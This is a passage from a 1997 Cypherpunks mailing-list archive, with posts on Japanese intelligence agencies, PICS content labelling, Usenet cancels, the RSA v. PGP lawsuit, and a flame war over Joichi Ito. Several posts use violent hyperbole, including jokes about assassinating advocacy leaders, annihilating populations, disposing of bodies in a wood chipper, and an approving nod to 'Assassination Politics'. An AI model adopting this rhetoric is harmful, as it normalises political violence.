to house the Defense Agency and SDF in Ichigaya, Tokyo (the site,
incidentally, where Mishima Yukio committed suicide in 1971). This
new installation will be used to house the new superagency, or
"information headquarters," and the staffing level is eventually
expected to reach 5,000 or even 6,000 personnel, half of whom will
be field agents. Oddly enough, the focus of this new agency, if one

<6000 employees....now that's starting to look more like a large,
NSA-scaled operation! And Joicho Ito can be a part of this grand and
glorious venture! What would-be journalist wouldn't jump at the opportunity
to become one with Big Brother?>

takes the military planners at their word, would seem to be almost
exclusively domestic. What this means is that a further 3,000
personnel will be added to the 1,800-odd existing investigators in the
Koancho whose main task is to look out for spies inside Japan. There
is hardly any focus, however, on events outside. This is partly due,
no doubt, to the existence of Article 9 of the Constitution, which (at
least according to the most accepted "interpretation" forbids Japanese
military forces from operating outside of the country. It is known, for
instance, that Japan's military planners would like to launch a military
surveillance satellite, but they have not (yet) been able to carry out the
plan. If we look at espionage, we find that JETRO has also attracted
some attention in recent years, but only because of the larger focus
given to economic intelligence, and the fact that JETRO's activities are
mostly focused on Japan's nominal allies in the U.S. and Western
Europe. Given a system where most of the heavy-duty agencies such




as the Koancho are almost solely focused on counter-espionage,
JETRO is obviously involved in a project of a different nature.
"Outside Agencies" In numbers, the Japanese intelligence community
may seem, indeed, to be a hobbled version of its counterparts in the
U.S., Russia, France, or Israel, especially in terms of espionage,
though the inauguration of the new "information headquarters" may
change this image. When looking at Japanese intelligence-gathering
capabilities, however, due consideration must be given to the fact that
these functions have historically been "subcontracted" out to the
private sector. During the early 20th century and in the prewar and

<"Subcontracted out to the private sector." Now there's the real
explanation for why Japanese intelligence agencies are not yet staffed at
NSA-type levels. The MITI-influenced corporations are working closely with
the SIGINT facilities. Could be why that design tape for the x86 series
vanished upon arrival in Tokyo...whoops, now Chobetsu will have to shoot
me.>

wartime periods, it is well documented that Japanese trading
companies were valuable sources of information to government
agencies. Nor can it be said that such relationships no longer exist. In
a recent issue of Bungei Shunju, a retired Koancho official wrote of
the existence of an "external organization" called Kyudankai, which
had the function of analyzing information (hence espionage) on
military movements in the Soviet Union. In fact, he claimed that this
group had knowledge of the impending 1980 invasion of Afghanistan,
and communicated these suspicions to the Japanese government.
Interestingly, the article was obviously an attempt to boost the prestige
of his organization, but it ends up giving credibility to suspicions that
Japan's intelligence services are not as crippled as they might first
appear to be. We are thus left with the suspicion, albeit
undocumented, that other similar organizations continue to exist today
and to provide privileged information to the Japanese government.




Moreover, it is easy to conclude the inauguration of the new
"information headquarters" in the Defense Agency may augur a period
of increased intelligence activities. A build-up of personnel is
obviously taking place, and in a crisis it seems clear that the tasks of
these people could quickly be reoriented to play a more
outward-looking role. The numbers themselves bear watching.





There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From dformosa at st.nepean.uws.edu.au  Sun Aug  3 13:13:10 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Mon, 4 Aug 1997 04:13:10 +0800
Subject: forged cancels (Re: Entrust Technologies's Solo - free download)
In-Reply-To: 
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 2 Aug 1997, Paul Bradley wrote:

[...]

> > Ok so if a mailing list gateway @bwalk.dm.com pumps thousands of broken
> > posts into usenet you don't wish them to be removed from usenet?
> 
> That would be for Dimitri to decide for himself, and not for some 
> cocksucker to take a unilateral decision on.

I have made no such unilateral decision,  I have simply asked a question
of the good Doctor.

> Of course disabling cancels on all news-servers would mean such a freak
> article couldn`t be cancelled, even by it`s author, 

Wouldn't authentercated cancel models be better so an artical could be
cancelled by its author and no other.

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBM+SpXaQK0ynCmdStAQGiGwP+Pe67+xKUZetX1ORoW1V5M5macasopNtu
FiPeEB7e+crbb+Gut+jfjAHEPh2wHUsviRkApt1wbnjohtT0hYgXWY34lX64VjBz
OB1q9Nm0y0ATclw9fsv3bgDH5wRVFtogJe6Lmb0e1kI4rp4hNUGTf/AFclUcK+nP
UVIIa67yRCM=
=1197
-----END PGP SIGNATURE-----






From apache at bear.apana.org.au  Sun Aug  3 15:30:10 1997
From: apache at bear.apana.org.au (Charles)
Date: Mon, 4 Aug 1997 06:30:10 +0800
Subject: PICS and intellectual freedom FAQ
In-Reply-To: 
Message-ID: <199708032205.IAA09870@bear.apana.org.au>



-----BEGIN PGP SIGNED MESSAGE-----



A link in the PICS FAQ that Declan posted was to The Net Labeling
Delusion. For anyone interested in the relationship of PICS/RASCi
and censorship I recommend reading this article in detail. It presents
a very interesting case for censorship by stealth and argues that since
blocking software will block unlabeled sites that mandatory-voluntary
labeling is unnecessary and unjustified. It also examines some
possible motives on the part of government for advocating such
mandatory-voluntary censorship schemes.

For the full text see :

     http://www.thehub.com.au/~rene/liberty/label.html

Here is a snip from the introduction..

Protection or Oppression
========================

The developers of PICS say it's an infrastructure which facilitates
voluntary labelling  and selection of Internet content.  They promote
it as "Internet Access Controls  Without Censorship". Its advocates
say it's nothing to do with censorship and can't  assist the
censors. Meanwhile, PICS has achieved its original objective: to
provide an  alternative to government censorship legislation, that is,
to provide instead a  technological means of facilitating censorship. 

Governments, finally beginning to comprehend the difficulties of
blatantly censoring the Net, are becoming enthused about filtering
technology. Service providers, desperately hoping to place themselves
out of reach of over-zealous governments who would hold them liable
for material they carry, are demanding their customers rate and label
all their material. 

Ironically, an increasing number of the original proponents of
filtering software are becoming much less enthused as a host of new
issues arise. Filtering programs and labelling look set to become
privatised censorship disguised as consumer information backed by
government coercion. 

This document does not propose that PICS systems and third party
filtering software should be entirely black-banned by Net users. It
does, however, suggest that parents and other consumers should
ascertain what type of information is, and is not, being blocked and
that filtering advocates should be extremely cautious about
unreservedly promoting these systems as the saviour of the Net. 

Contents: 

Summary
What are filtering programs and rating/labelling systems?
Labelling has nothing to do with censorship, does it? 
   What is censorship? 
   What is labelling? 
   Labels are just tags, helpful information, surely? 
   Book in libraries are labelled, is there a difference? 
   Are book reviews similar to labels? 
   So, is labelling censorship or not? 
Is labelling likely to become compulsory? 
Will labelling protect children from harmful material? 
Do governments have a legitimate interest in enforcing, or encouraging,
labelling? 
Why would governments seek to enforce labelling? 
   The alleged reasons
   - To protect children
   - To enable electronic commerce to reach its full potential
   The other agenda
   - Censorship by Stealth: making publication too difficult, costly
   and risky
   - Banning access to the rest of the world
   - Facilitating future changes to censorship laws
   - Being seen to be doing something
How would governments enforce labelling? 
   Legislation 
   Coercion 
What's wrong with compulsory labelling anyway? 
What's wrong with the RSACi Rating System?
Voluntary labelling is a good idea, isn't it?
Conclusion

 Summary: 

Indications are mounting that labelling of all content will be made
mandatory in Australia.  

Claims that all material, particularly material unsuitable for
children, must be labelled in order to protect children are
technologically ignorant at best, insidious at worst.

Unilateral action in Australia will increase costs in the burgeoning
on-line multimedia industry here, and may force many sites off-shore.

Compulsory labelling will restrict quantity and quality of information
as a result of: 

   the complexity, unsuitability and inadequacies of some, probably all,
   rating systems similar to RSACi 
   difficulties associated with lack of technical knowledge 
   overly cautious ratings because it is too much effort, or to avoid
   potential complaints, or to purposely seek to undermine an enforced
   system 
   lack of time and/or staff to rate material 
   financial restraints 
   unwillingness to enter into complex legal agreements with ratings
   organisations 
   unwillingness to provide personal information to ratings organisations
   which can be used for, or sold to, mailing lists etc. 

Compulsory labelling will force content providers to: 

   self-censor in accord with someone else's value system 
   place themselves at greater risk of complaints regarding legal material
   because of the many shades of grey inherent in rating systems.

Compulsory labelling enables governments to achieve censorship by
stealth as well as facilitate future more censorious laws whilst
claiming non-censorious intent.

Compulsory labelling achieved by government coercion of private
enterprise enables government to avoid all responsibility and
criticism for resultant problems and difficulties.

Voluntary labelling of material which is suitable and intended for
children will provide a child-safe environment.

Rating services have the potential to influence community views and
attitudes to a greater extent than either existing broadcast media or
uncensored access to the Internet.  

Rating organisations must be required to publicly disclose concise
details of rating criteria and value systems to ensure consumers can
ascertain what is, or is not, blocked. 

- -- 
   .////.   .//    Charles Senescall             apache at bear.apana.org.au
 o:::::::::///                                   apache at quux.apana.org.au
>::::::::::\\\     Finger me @bear for PGP PUBKEY      Brisbane AUSTRALIA
   '\\\\\'   \\    Apache




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBM+UAunawhvoxf0r9AQGCuQf/Xf2x7nCYg9m+F5Tanx/azsNrSSODsu8L
iZ9sfzAoJBu1cT7KHfPgoQiW3PYAGtWyQRodwiwy8Io2KiYLEsKj6M9ve7uqwn2Z
ZdisUZUEcSp4VwGn/O9ULnvfRBg1nCwey075qRgxo4A4jnJ91ALi7KgQZTwpqcPt
N/3J9WE5A3rELWr0fgylScgW+48nDueedNz1W806OV1k+SZnZVsvmpg3Aozio19N
MGV83llDIjJrJPJul+cCJZR9VipjFtm9S3tYZiNQOXwQF8Jnlm/O2tWDrJ+zmFnx
wMzV09D+qoPOEtquSCtmNCcXBzvP4go6Ex4bOAJzi/aK5iBP5eoY2g==
=OqAV
-----END PGP SIGNATURE-----






From enoch at zipcon.net  Sun Aug  3 16:21:53 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Mon, 4 Aug 1997 07:21:53 +0800
Subject: Eternity Content Suggestions
Message-ID: <19970803231431.4542.qmail@zipcon.net>



Just a few off the top of my head... 

An "Assassination Politics" home page, containing the story of Jim Bell,
all publicly available documents on the case, and links to all the
currently operating AP-Bots.

The alleged NSA Manual.

Favorite Cypherpunks Cryptographic Links, including helpful offshore
source code archives, and a pointer to the Cyphernomicon.

Seekret Skriptures ('Nuff Said)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}
 








From ppomes at Qualcomm.com  Sun Aug  3 16:53:04 1997
From: ppomes at Qualcomm.com (Paul Pomes)
Date: Mon, 4 Aug 1997 07:53:04 +0800
Subject: Entrust Technologies's Solo - free download
In-Reply-To: 
Message-ID: <25455.870651372@zelkova.qualcomm.com>



|Paul Pomes sends me harrassing e-mail and quotes more obscenities from
|the anonymous remailers:

As you posted the obscenities in the first place I fail to understand your
objections.

Pot, kettle, black, Dimi.  Again, why are you trying to shut down the 
remailers with the Vulis-bot?

/pbp






From nobody at REPLAY.COM  Sun Aug  3 17:36:52 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 4 Aug 1997 08:36:52 +0800
Subject: Broad-Band Proclaimations ("EVERYBODY AGREES THAT...)
Message-ID: <199708040023.CAA04380@basement.replay.com>




EVERYBODY AGREES THAT...smoking is bad for you.

>From News of the Weird:
* Among the recipients of the American Lung Association's
"Thumb's Up" motion-picture awards, presented at the time of the
Oscars in  March to honor those films and characters who present a
no-smoking image, was Woody Harrelson for his role in
discouraging his movie wife from smoking in "The People Vs.
Larry Flynt."  However, in the movie, both Flynts are heavily
addicted to illegal drugs and seem to be indifferent to sharing
needles for injecting them.






From sei at gosnet.com  Mon Aug  4 08:43:12 1997
From: sei at gosnet.com (Foreign Sales 4U)
Date: Mon, 4 Aug 1997 08:43:12 -0700 (PDT)
Subject: FREE SAMPLES......FOREIGN SALES
Message-ID: <199708043242FAA56018@21564561HG.5145345H.4684664KAA4.86.32.7>



 =============================
 THIS IS A ONE TIME MESSAGE... 
 =============================

WE LOCATED YOUR COMPANY ON THE INTERNET.........AND KNOW HOW TO MAKE 
FOREIGN SALES  FOR YOU..............WE WANT TO SEND THE PRESIDENT
OF THE COMPANY SOME EXAMPLES OF OUR WORK WITH YOUR EXACT PRODUCT. 

WHAT IS THE NAME OF THE PRESIDENT OF YOUR COMPANY PLEASE??????
WOULD YOU BE SO KIND AS TO  E-MAIL US  HIS/HER NAME.

THANK YOU.........IRENE NATHAN........SCOTT ALLEN

EXPORT SALES......email us at: user2361 at servmail.com
..FOREIGN S





From tcmay at got.net  Sun Aug  3 19:47:34 1997
From: tcmay at got.net (Tim May)
Date: Mon, 4 Aug 1997 10:47:34 +0800
Subject: How age and PICS ratings may go down...
Message-ID: <199708040231.TAA09298@you.got.net>




One way "voluntary" age ratings--very similar to PICS ratings--may be
mandated is through the kind of "plea agreement" cited below. (I don't
know if this site is real or not, but the post presents a scenario which
will become more common, I think.)

Someone writes something, or has a site, and is busted for some charge.
(There are many, even with what remains of the First Amendment. Child
porn, obscenity, the new copyright laws, the Anti-Terrorism Act, etc.) A
nolo contendre or guilty plea to a lesser charge is entered, with the
agreement that an age verification system will be used, or a PICS rating,
etc. And so the government gets the kind of censorship it wants.

(Duncan will likely argue that this is impossible to enforce. Maybe in the
limit, in the sense that some will fall through the cracks. But the
dangers to anyone hosting words or pictures on their sites is very real.
As more and more ISPs drop controversial material--think of several recent
cases, and perhaps even the case of our own John Young--and as more child
porn/celebrity nude/obscenity cases are filed....by the time the Thomases
are both out of prison, most sites will likely be heavily editing
themselves, imposing age limits, and using PICS ratings.)

The article is below.

--Tim May


> From: 
> Newsgroups: alt.binaries.pictures.joanne-guest
> Subject: The celeb site illegal in Texas
> Date: 3 Aug 1997 10:20:21 GMT
> Organization: Commuter Communication Systems, Austin TX
> Lines: 36
> Message-ID: <5s1m15$2m6$732 at quest.ccsi.com>
> NNTP-Posting-Host: savage24.ccsi.com
> Xref: news.znet.com alt.binaries.pictures.joanne-guest:5351
> 
> The fakes page, along with the XXX passwords page, is the one that got
me in trouible with the law ans the community action groups. I used to
have these two pages  in the free access web, and it seems that many
people found it objectionable that kids could get to the "Celebrity
Blowjobs" and other work. They were right. I was wrong. I tried the
Ulysses argument, but they just wouldn't accept the rationale that
watching Kathy Lee give head had serious and important literary value. By
the way, this is the same page that generated the two-page write-up in
Internet Underground.
> 
> So, I copped a plea, agreed to Adult Verification. Anyway, there is age
verification now, and I am free to offend the adults of my community, and
hopefully all communities everywhere.
> 
> AdultSights members......you're there dudes.
> 
> non-members, you can get one instantly
> (also gets you in to my passwords page, my Encyclopedia (2200 celebs),
and much more, plus 2,000 other sites)
> 
> http://www.scoopy.net/fooled.htm






From kent at songbird.com  Sun Aug  3 20:02:58 1997
From: kent at songbird.com (Kent Crispin)
Date: Mon, 4 Aug 1997 11:02:58 +0800
Subject: The Poor in Spirit
In-Reply-To: <199707311120.MAA00669@server.test.net>
Message-ID: <19970803193422.17765@bywater.songbird.com>



On Sun, Aug 03, 1997 at 10:28:28AM -0400, frissell at panix.com wrote:
>At 09:29 AM 8/2/97 -0700, Kent Crispin wrote:
>>In more general terms: A "free market" fundamentally grants more
>>control to those with more money.  
>
>In a free society, the "poor" have more money (collectively) than the rich 
>and outbid them for resources all the time.  

I'm not sure what you mean by "free society", since earlier writings
by you and others indicate that you believe that no such thing
currently exists (certainly not here in the US), or indeed has ever
existed.  Consequently, your statement here must be false on its 
face, since the poor have never been in a "free society".

Even so, your statement is not an argument against what I said in any
significant way, but rather is a corollary -- the trend for the rich
to get richer and the poor to get poorer, if extrapolated to the
extreme, still results in a very small number of people controlling
more wealth than all the rest of mankind.  What intrinsic 
characteristic of completely unrestricted markets do you see that 
naturally contervails this trend?

> Were this not so, communities of 
>the "poor" would never increase in size and yet they do.

Doesn't follow at all.  The poor can increase in numbers, and just 
get poorer.  You can see this all over the world.

>It is also much easier for the poor to get money in a free society than for 
>the powerless to get power in the sort of societies you favor.

Doubtful.  I favor free societies.  Realistic free societies, that is. 

>I can teach a poor person in America today the simple ways to triple or 
>quadruple his income. 

I don't believe you.  Oh, in isolated cases perhaps.  But not as a 
general lesson you can give to any Joe Poverty, and suddenly make 
him middle class.

But once again I am struck by the thought that, contrary to much of 
the sentiment expressed on this list, you actually believe that 
America today is a *true free society*.  Have you turned in your 
cpunks credentials?

> I could not teach a resident of France or Germany or 
>Japan a simple way to triple or quadruple his "influence" on his government

But are you then  implying  that you could in the US!?!?

>and indeed a tripling of such influence would give him much less than a 
>tripling of income.

No doubt about it.  :-)

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From azur at netcom.com  Sun Aug  3 20:37:42 1997
From: azur at netcom.com (Steve Schear)
Date: Mon, 4 Aug 1997 11:37:42 +0800
Subject: Infantocracy
Message-ID: 



INFANTOCRACY

On both the state and federal level, government has become obsessed with
kiddie issues

By Rafael Tammariello

The United,States is evolving into what can be characterized as the world's
first "infantocracy" a nation whose laws, policies and political culture
are captive to the perceived needs and wants of a mythical brood known as
"The Children."

By proxy, the United States is becoming a country ruled by "The Children"
as the central government embarks on a systematic quest to circumscribe the
liberties of adults in the name of shielding "The Children" from all things
harmful.

"The Children" are not real, fleshandblood kids who grow up to be adults,
who spend the remaining 80 percent of their lives as adults and seek to
enjoy the rights, privileges and prerogatives of adulthood. No. "The
Children" of the infantocracy's conception are sainted, angelic beings,
wideeyed, wholesome and perpetually about 7 years old, judging from the
White House photo-ops.  "The Children" are pure and infinitely vulnerable
beings who will never grow up, never need to exerise adult choices, never
light up a cigar, watch a good violent drama on TV or entertain friends
over the backyard grill.

The emerging infantocracy vigorously seeks to limit the range of adult
activities-from free speech to driving to smoking to gun use to television
viewing to Internet access to backyard cooking.

These days, the business of America is certainly not the business of
securing the liberty of her citizens, as the founding fathers envisioned
two centuries ago. Ceaseless attacks on the Bill of Rights-launched in the
name of protecting "The Children" from guns or smut or whatever-emanate
from the very members of Congress sworn to defend those freedoms.

The legislative and executive branches of government at the state and
national levels are obsessed with kiddie issues-to the virtual exclusion of
all else.

What was the theme of last week's National Governor's Association confab at
The Mirage? Early childhood development, replete with gurgling babies as
omnipresent props. At one point, Nevada Gov. Bob Miller was practically
buried in babies. A week earlier, President Clinton, surrounded by
squealing infants, pushed for a tobacco surtax to finance socialized
medicine for "The Children."	~

Who are these children-"The Children"-whose salvation lies in the
suppression of adult freedoms and prerogatives?

Consider: A comprehensive poll by Public Agenda, a New Yorkbased research
firm, asked 2,000 adults to reveal their thoughts about America's
youngsters. The results, published in June under the title "Kids These
Days: What Americans Really Think About the Next Generation," indicate a
massive vote of "no confidence" in kids. A strong majority of the adults
surveyed said they perceived a disturbing upsurge in "wild, rude and
frightening behavior among young people. Fully 63 percent did not believe
today's kids will make the country a better place when they grow up.

But "The Children" are not these  children-not the illmannered youngsters
in big pants with their hats on backwards, or the Beevis and Butthead
clones. No, no. "The Children" are sainted, immortal beings, forever young,
forever innocent, vulnerable and in need of protection from their saviors
in Washington.

Let's get this straight: The majority of children are good kids; children
do need protection; they do need nurturing and moral direction-from their
parents, not Uncle Sam.

Our children are the future. But, strangely, the American infantocracy is
not really, as its advocates assert, concerned about the children's future.
Indeed, the infantocracy contemplates no realistic future for "The
Children-that is, it ; fails to take into account the inevitable fact that
childhood is a fleeting thing and that a society molded in the image of a
daycare center may be hostile to adults, which the children, the real
children, will soon become.

When the real children become real adults, they may want to engage in those
grownup activities that are being proscribed wholesale by the grim,
puritanical infantocracy being built in the name of their mythical
counterparts "The Children."

Bill Clinton is, of course, the chief architect of the infantocracy. Every
significant Clinton policy initiative-from tax credits to gun control to
nuclear arms reduction-is trotted out under the banner of "The Children."

But others on both the left and right assist in the creation of this odd
new society. Indeed, the most recent attempt to limit adult choices in the
name of "The Children" emanated from the right, in the dour personage of
Utah Sen. Orrin Hatch, who sought a national ban on
gambling within 10,000 feet of schools, parks and any other place "The
Children" might find themselves. The Hatch initiative, which could throttle
Las Vegas (a bright anomaly in the new childfixated universe) has stalled.
But do not be surprised if a similar proposal arises from the national
gambling commission's conservative moralists or from some of their
soulmates in Congress.

Then there was Republican Sen. Mark James' attempt in the Nevada
Legislature to censor advertising that might offend the sensibilities of
"The Children."

Attacks on adultoriented material on the Internet and on television-the
calls for a "voluntary ratings system" and "voluntary" selfcensorship (all
under threat of federal regulation, of course)-have come from both
Biblebrandishing rightists and therapeuticstate leftists. The voluntary
ratings system is the initial baby step toward government-ordered
infantiization of the airwaves making them safe for "The
Children." The mythical "Children," you understand, will remain seven
years, old forever. Unlike real children, "The Children" never' grow up and
want to watch a good bloody flick on the tube.

The Constitution's First Amendment provides no armor when the infantocracy
deploys its SWAT teams to rescue "The Children." Witness Joe Camel,
bludgeoned to death "voluntarily" by his creator as government regulators,
the White House, Congress, and a legion of attorneys general grabbed, the
tobacco industry's  throat.

In the name of saving "The Children" from Demon Tobacco, a whole group of'
companies, engaged in a heavily taxed legal business have volunteered to
surrender  their First' Amendment right to advertise.

If Clinton and his two chief tobacco advisers - Baby Doctors C. Everet Koop
and David Kessler work their will, the United States will have tobacco
prohibition in a few years, and that will include cigars. When Mr.
Clinton's FDA reduces the amount of nicotine in cigars and cigarettes to
zero, smokers will be forced to find the real smokes on the black market

But the emergence of a black market and new criminal class doesn't bother
Bill Clinton. As the president said in Madrid on July 9: "What is a black
market ... (a) 1 percent penetration of the market, a  3 percent
penetration of the market? Would we deny the FDA the right to protect 100
percent of our citizens because there might be a few blackmarket
cigarettes around?''

Ah, the sainted Children. Surely, as Mr. Clinton states, banning nicotine
will protect 100 percent of them, just as the prohibition of marijuana has
kept them 100 percent drugfree.  And, if Clinton's estimates are correct,
only 500,000 to 1.5 million American adults will be converted into
blackmarket criminals. We'll need some new prisons-at least 500 of them.
The benevolent garb of the infantocracy conceals the mailed fist of The
Enforcer.

The infantocracy's jihad against the First Amendment and adultAmericans
who choose to smoke is not its only display of raw force. New cleanair
rules advanced by Bill Clinton and his fanatical Environmental Protection
Agency also represent a vast expansion of government power over states,
cities and individuals, right down to their barbecuing habits. When Mr.
Clinton announced the new rules on June 25, he said: "I have approved some
very strong new regulations today that will be somewhat controversial, but
think kids ought to be healthy." Come ye forth and sacrifice at the altar
of the sainted "Children."

Under the new EPA edict, cities across the nation will be compelled to
adopt and enforce policies that are designed to result in air that is
virtually free of dust and manmade ozone. The ' cost of implementing the
rules - that the EPA hypothesizes will marginally extend the lifespans of
some kids with asthma-could, by one estimate, exceed $330 billion a year,
far more than the defense budget.

The Los Angeles limes points out, no technology exists that could scrub
that city's air clean enough the meet the new standards. The only way to
achieve compliance in cities such as L.A. (which cannot handle even the
existing air quality standards) would be the adoption of draconian
measures: restrictions on driving, mandated carpooling, shutting down
industries, banning gaspowered lawn mowers and so on.

Mr. Clinton and the EPA pooh pooh the idea that many urban areas, in their
desperation to comply with Washington's dictates, will be forced to outlaw
fireplaces and backyard barbecues. But cities such as Los Angeles and
Denver in their struggle to meet even the extant cleanair standards-have
already taken such steps; and other cities will be forced to follow suit.

As the infantocracy gears up, its creators and supporters busy themselves
with many other projects.  Clinton has already ordered federal officers'"
to affix riggerlocks on their guns at home, and he fervently yearns for
national legislation requiring, hem on all firearms owned' by citizens.
Said Clinton in pushing! is proposal: "We protect aspirin bottles in this
country better then we protect guns from accidents by children." The
Sainted Children. And, if trigger locks .'prevent' adults,: from
!effectively defending their homes and their children, real children - it's
just another requisite sacrifice of adult choices in the name of the
mythical "Children" who are always 7 years old and who never grow up to
have homes and families of their own to defend.

Hand it to Yale Professor Kelly Brownell, director of the University's
Center for Eating and Weight Disorders, for providing the infantocracy a
focus for its next crusade. Heir Docktor Brownell has raised the alarm: The
United States is wash in unhealthful, fatty foods, and kids, at the urging
of bad clowns, are lured into eating them. Two weeks ago, Brownell told The
Washington Times: "Junk food advertisements should be regulated, and excise
taxes imposed on highfat foods, just as they are on tobacco and
alcohol.... As a culture, we get upset about Joe Camel, yet we tolerate our
children seeing 10,000 commercials a year that promote foods that are every
bit as unhealthy."

"The Children," you see, never grow up and will, never want to order a
wellmarbled steak with chocolate mousse for dessert. For "The Children"
remain 7 years old forever, and cherish their fruits and vegetables.

Joe Camel, meet Ronald McDonald in the infantocracy's roomy dungeon.

The emerging American infantocracy embraces a vision that does not include
you driving to a friend's house, grilling burgers on the backyard barbecue,
and enjoying a cigar afterwards in front of the fireplace. The engineers of
the infantocracy are creating a society tightly fixated on stamping out all
of life's little risks. It's a task undertaken at the expense of grownup
things and adult choices. This new society is a strange, confining place, a
place that's increasingly difficult to recognize as the land of the free or
the home of the brave.








From jya at pipeline.com  Sun Aug  3 20:44:25 1997
From: jya at pipeline.com (John Young)
Date: Mon, 4 Aug 1997 11:44:25 +0800
Subject: PGP Answers RSA
Message-ID: <1.5.4.32.19970804032232.0085c390@pop.pipeline.com>



Thanks to John Gilmore we offer a 44-page package of
PGP's court filings in response to RSA's suit:

   http://jyx.com/rsavpgp2.htm

Exhibits of early letters among Cylink, RSA, and PGP preceding 
the suit are of interest, one of which has been provided before
by Greg Broiles at parrhesia.com.

We've also put on JYX the AOL-axed RSA v. PGP docs, linked
to this latest: the RSA suit and the Lemcom License.

A bit more from JG will be ready in a few days.







From nobody at REPLAY.COM  Sun Aug  3 21:05:58 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 4 Aug 1997 12:05:58 +0800
Subject: Tim Throws a "Leaner" / Re: Tim Speaks the Truth /  Re: Tim Misfires / Re: Joichi Ito as a Junior Policeman
Message-ID: <199708040346.FAA26108@basement.replay.com>



Joichi Ito wrote:
> As for Tim's message... I keep worrying (when I am in Japan) that I'm too
> radical, so it's nice to hear from someone who is really hardcore to put
> a wimp like me in my place. ;-P

  Actually, when Tim puts someone in what he considers to be their
place,
it usually involves the purchase of a tombstone.

Tim May wrote:
> Unlike "Toto," who claims to be "Truthmonger," I speak the truth.
 
"Am I Toto, dreaming I am TruthMonger, or TruthMonger, dreaming I am
Toto?"

> At 5:12 AM -0700 8/3/97, Joichi Ito wrote:
> >so they probably are pretty militaristic), Japan does not have the
> >equivalent of the NSA. It really is in Japanese national security interests

> Wise up, Joichi. You live in society more totalitarian than anything we
> fear. 

  Japanese society has long been very rule-oriented, in large part as
a result of the country's geography, population and history.
  A "No Farting" sign which might reek of totalitarianism when placed
on the open range, might well seem less so when placed in a two-man
tent occupied by six people. Environment, geography and the history
of a a country, society and its people, all play a part in the degree
to which an individual will view their personal position in regard to
the society and government around them. And each will perceive the way
in which they feel they can best promote their beliefs within their
society and government.
  
> Japanese citizen-units under video surveillance and afraid to speak
> out. 

  It seemed to me that after Jim Bell's arrest, most of the posts to
the list posted an almost-standard disclaimer: "Actually, although
I hardly knew the man, thought he was a _loon_, and _disagreed_ with
most of what he had to say..."

> And surveillance and espionage technology deployed by your fascist
> government--a term I mean literally, not casually--will worsen things
> dramatically.
> The only "cooperation" with them is to seek their annihilation.

  Government aside, if I was forced by fate to live in Japan, my first
act would probably be to annihilate 80% of the population, just to get
enough elbow room to negate the need for so damn many rules, both from
society and government. Of course, the same could probably be said for
New York City, from my persepective.

> And nothing but mischief will come out any meetings with government on
> "crypto policy," as their goals can never be our goals. At least in the
> U.S., despite obvious flaws, we have a "Congress shall make no law"
> provision which _tends_ to make government meddling in speech, such as
> meddling in crypto, more difficult.

  I hope that the "flag" Tim is wrapping himself in isn't the same one
that he was burning yesterday.
  {Not that I'm accusing Tim of being purposely deceitful. It's just
that when we throw a "leaner" instead of a "ringer," they sometimes
lean in opposite directions.}

  Seriously, I believe in the original goals of organizations such as
the EFF and CDT, etc, but I also believe that their leaders should be
assassinated every few years in order to allow the promotion of people
whose senses are not so hardened by D.C. that they no longer recognize
a "stench" when they smell it. (ibid, the Constitution and our beloved
Legislators.)
  Joichi Ito sounds very sincere about his commitment to act in a way
he feels will promote cypherpunkish viewpoints within his system of
government. I can't help but believe, however, that his efforts will
ultimately only serve to delay the creeping spread of tyrannical cancer
in our societies and our governments.
  I tend to lean more toward Tim's viewpoint, that there comes a point
when the best option is surgery (a radical Legislat-ectomy?), but I
would not go so far as to suggest that others should not pursue other
treatments which they think may stem the tide of the disease.

  I hope Joichi Ito paid enough attention to the OKC bombing to realize
that some surgeons are less skilled than others, and that there is a
risk in remaining too long in close proximity with cancerous tissue.

DreamMonger
"There's something wrong when I'm a TruthMonger 
   under an increasing number of personas."






From tcmay at got.net  Sun Aug  3 22:04:35 1997
From: tcmay at got.net (Tim May)
Date: Mon, 4 Aug 1997 13:04:35 +0800
Subject: Tim Throws a "Leaner" / Re: Tim Speaks the Truth
In-Reply-To: <199708040346.FAA26108@basement.replay.com>
Message-ID: 



At 8:46 PM -0700 8/3/97, Anonymous wrote:
>Joichi Ito wrote:
>> As for Tim's message... I keep worrying (when I am in Japan) that I'm too
>> radical, so it's nice to hear from someone who is really hardcore to put
>> a wimp like me in my place. ;-P
>
>  Actually, when Tim puts someone in what he considers to be their
>place,
>it usually involves the purchase of a tombstone.

Actually, the trick is to avoid having the body discovered. What goes into
the 10 h.p TroyBilt Chipper/Shredder comes out not needing any kind of
tombstone at all.

Not that I have ever advocated killing mere folks like Joichi with whom I
disagree strongly. (A new quote: "Killfiles don't need tombstones.")

As for Joichi's message quoted above, he should hope to hell that he wakes
up and realizes that not even in Japan can journalists--which is what I
thought he once was, or claimed to be--serve on Ministry committees to
decide how citizen-units may communicate!

Any journalist in Europe or in the U.S. would be seen as having irreparably
compromised his journalistic objectivity by serving on such a panel! And
properly so, of course.

Joichi is of course free to compromise his would-be journalistic standards
as he wishes. We are, of course, equally free to severely criticize this
and to notify "Wired" and other such outlets of his stuff.

(How long do you think Brock Meeks could keep whatever reputation he now
has if he served as a consultant to the National Security Agency?)

>  Japanese society has long been very rule-oriented, in large part as
